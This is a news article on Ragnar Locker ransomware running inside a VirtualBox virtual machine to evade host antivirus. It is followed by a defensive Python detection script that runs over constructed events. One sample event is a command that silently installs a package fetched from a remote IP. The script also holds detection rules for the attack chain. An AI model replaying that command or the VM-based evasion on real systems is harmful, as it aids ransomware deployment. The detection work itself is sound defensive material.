Ragnar Locker Ransomware Attack Hides Inside Virtual Machine
The UK-based cybersecurity firm Sophos first spotted this new technique and it shows just how far cybercriminals are willing to go to ensure that their ransomware attacks are not detected by a victim’s antivirus or other security software. The tactic “lends itself very well to ransomware because it wants to encrypt files, and attackers would want that to be done by a trusted application,” said Mark Loman, director of engineering, threat mitigation, at Sophos, in an interview with SC Media.
In order to avoid detection by antivirus software, the operators of the Ragnar Locker ransomware have begun installing Oracle’s VirtualBox and running virtual machines on the computers they infect before deploying their ransomware.
In a blog post on the topic, Loman explains that a ransomware attack leveraging a VM environment “takes defense evasion to a new level.” That’s because while the malicious code is able to attack the disks and drives of an infected host, the security software installed on said host cannot reach the malware. “Defenders only have a view of the physical machine, not of the virtual machine,” Loman further explained in his interview.
According to Sophos, the group behind RagnarLocker has been known to steal data from targeted networks before launching a ransomware attack in order to encourage victims to pay. Last month, they attacked the network of Energias de Portugal (EDP), claimed to have stolen 10TB of sensitive company data and demanded a ransom of $11m while threatening to release the data if the ransom was not paid.
In past attacks, the Ragnar Locker group has used exploits of managed service providers (MSPs) or attacks on Windows Remote Desktop Protocol (RDP) connections to gain a foothold on targeted networks. After gaining administrator-level access to the target's domain and exfiltrating data, the group has used native Windows administrative tools such as PowerShell and Windows Group Policy Objects (GPOs) to move laterally across the network to other Windows clients and servers.
In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server. The primary contents of the MSI package were:
- A working installation of an old Oracle VirtualBox hypervisor—actually, Sun xVM VirtualBox version 3.0.4 from August 5, 2009 (Oracle bought Sun Microsystems in 2010).
- A virtual disk image file (VDI) named micro.vdi, an image of a stripped-down version of the Windows XP SP3 operating system called MicroXP v0.82. The image includes the 49 kB Ragnar Locker ransomware executable.
The virtualization software and the virtual disk image are copied to the folder C:\Program Files (x86)\VirtualAppliances.
The virtual machine is then booted into the stripped-down Windows XP SP3 build (MicroXP v0.82), and the attackers run their ransomware inside it, where antivirus software on the host cannot see the ransomware process.
Instead of seeing an unknown program making changes to files stored on a device and in shared drives, to the antivirus software all of these changes appear to have originated from the legitimate VirtualBox app so users are not notified. Sophos says that this is the first time it has seen a ransomware group abuse virtual machines during an attack but now that cybercriminals know this new technique works, expect to see others try to implement it in the future.
With the ransomware operating inside the virtualized environment, “its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,” the blog post states.
Fortunately, Loman told SC Media, such attacks can be detected before the damage is done. He explained that “endpoint protection with a zero-trust model against ransomware can still monitor the well-known hypervisor process that runs the virtual machine. By keeping a close eye on every file that the hypervisor touches in the physical world, it can detect if a document or image becomes malformed by encryption.”
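The two detection opportunities this article describes, the staged installation (GPO-driven msiexec fetching a package from a remote web server, a .vdi landing under C:\Program Files (x86)\VirtualAppliances) and Loman's "watch what the hypervisor touches" approach, can be expressed as host-side heuristics. The script below is an added illustration, not Sophos's product logic or anything from the Ragnar Locker samples. It runs over a handful of constructed, Sysmon-style process and file-write events (the remote URL, file paths and file contents are all made up), and it assumes VirtualBox.exe and VBoxHeadless.exe as the hypervisor process names. It checks a rewritten document two ways: the file's expected header must be gone and the content must be near 8 bits/byte of entropy, because compressed formats such as DOCX, XLSX and JPEG are high-entropy when perfectly healthy. Writes by the hypervisor to its own disk image under the staging folder are deliberately ignored, since those are normal VM activity.

```python
"""Host-side heuristics for ransomware run inside a VirtualBox guest (added example)."""
import math
import re
from collections import Counter
from dataclasses import dataclass

# Assumed VirtualBox process names (assumption, not from the article).
HYPERVISOR_PROCESSES = {"virtualbox.exe", "vboxheadless.exe"}
# Staging folder named in the article, lower-cased for comparison.
STAGING_DIR = r"c:\program files (x86)\virtualappliances"
# Bits per byte above which content is treated as encrypted/random.
ENTROPY_THRESHOLD = 7.0
# Expected leading bytes for document types; compressed formats are high-entropy
# even when healthy, so the header check is what distinguishes them from ciphertext.
MAGIC = {
    ".pdf": b"%PDF",
    ".docx": b"PK\x03\x04",
    ".xlsx": b"PK\x03\x04",
    ".jpg": b"\xff\xd8\xff",
    ".png": b"\x89PNG",
}


@dataclass
class Event:
    kind: str             # "ProcessCreate" or "FileWrite"
    image: str            # full path of the process performing the action
    target: str           # command line (ProcessCreate) or written file path (FileWrite)
    content: bytes = b""  # leading bytes of the file, read back by the monitor after the write


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty or constant data, 8.0 for uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def extension(path: str) -> str:
    dot = path.rfind(".")
    return path[dot:].lower() if dot != -1 else ""


def is_malformed_by_encryption(path: str, content: bytes) -> bool:
    """True when a document has lost its expected header and its bytes look like ciphertext."""
    magic = MAGIC.get(extension(path))
    if magic is not None and content.startswith(magic):
        return False  # header intact: a healthy (possibly compressed) document
    return shannon_entropy(content) >= ENTROPY_THRESHOLD


def detect(events: list) -> list:
    """Apply the three heuristics and return human-readable alert strings."""
    alerts = []
    for ev in events:
        proc = ev.image.rsplit("\\", 1)[-1].lower()
        if ev.kind == "ProcessCreate" and proc == "msiexec.exe":
            # Installer package fetched straight from a web server, as in the described attack.
            if re.search(r"https?://", ev.target, re.IGNORECASE):
                alerts.append(f"msiexec installing package from remote URL: {ev.target}")
        elif ev.kind == "FileWrite":
            path = ev.target.lower()
            # A non-hypervisor process (here the installer) dropping a disk image in the staging folder.
            if proc not in HYPERVISOR_PROCESSES and path.startswith(STAGING_DIR) and path.endswith(".vdi"):
                alerts.append(f"virtual disk image staged under VirtualAppliances: {ev.target}")
            # The hypervisor rewriting a host/share document so that it no longer parses as one.
            if proc in HYPERVISOR_PROCESSES and not path.startswith(STAGING_DIR):
                if is_malformed_by_encryption(ev.target, ev.content):
                    alerts.append(f"hypervisor process {proc} wrote encrypted-looking content to {ev.target}")
    return alerts


# Constructed sample events; the IP address, share name and file contents are invented.
RANDOM_LIKE = bytes(range(256)) * 8  # uniform bytes: exactly 8.0 bits/byte of entropy
SAMPLE_EVENTS = [
    Event("ProcessCreate", r"C:\Windows\System32\msiexec.exe",
          "msiexec.exe /i http://203.0.113.10/package.msi /q"),
    Event("FileWrite", r"C:\Windows\System32\msiexec.exe",
          r"C:\Program Files (x86)\VirtualAppliances\micro.vdi", b"<<constructed vdi header>>"),
    Event("FileWrite", r"C:\Program Files (x86)\VirtualAppliances\VBoxHeadless.exe",
          r"C:\Program Files (x86)\VirtualAppliances\micro.vdi", RANDOM_LIKE),  # benign guest disk churn
    Event("FileWrite", r"C:\Program Files (x86)\VirtualAppliances\VBoxHeadless.exe",
          r"\\fileserver\finance\Q1-report.pdf", RANDOM_LIKE),  # PDF header gone, ciphertext-like
    Event("FileWrite", r"C:\Program Files\Microsoft Office\WINWORD.EXE",
          r"C:\Users\alice\Documents\notes.docx", b"PK\x03\x04" + RANDOM_LIKE),  # healthy DOCX
]

if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print("ALERT:", line)
```

Running the script yields three alerts (the remote msiexec install, the staged micro.vdi, and the rewritten PDF) while the hypervisor's writes to its own disk image and Word's save of a legitimately high-entropy DOCX stay silent. In a real deployment the events would come from Sysmon or an EDR sensor and the content would be read from disk; the point is that the hypervisor process is visible on the physical host even when the ransomware inside the guest is not.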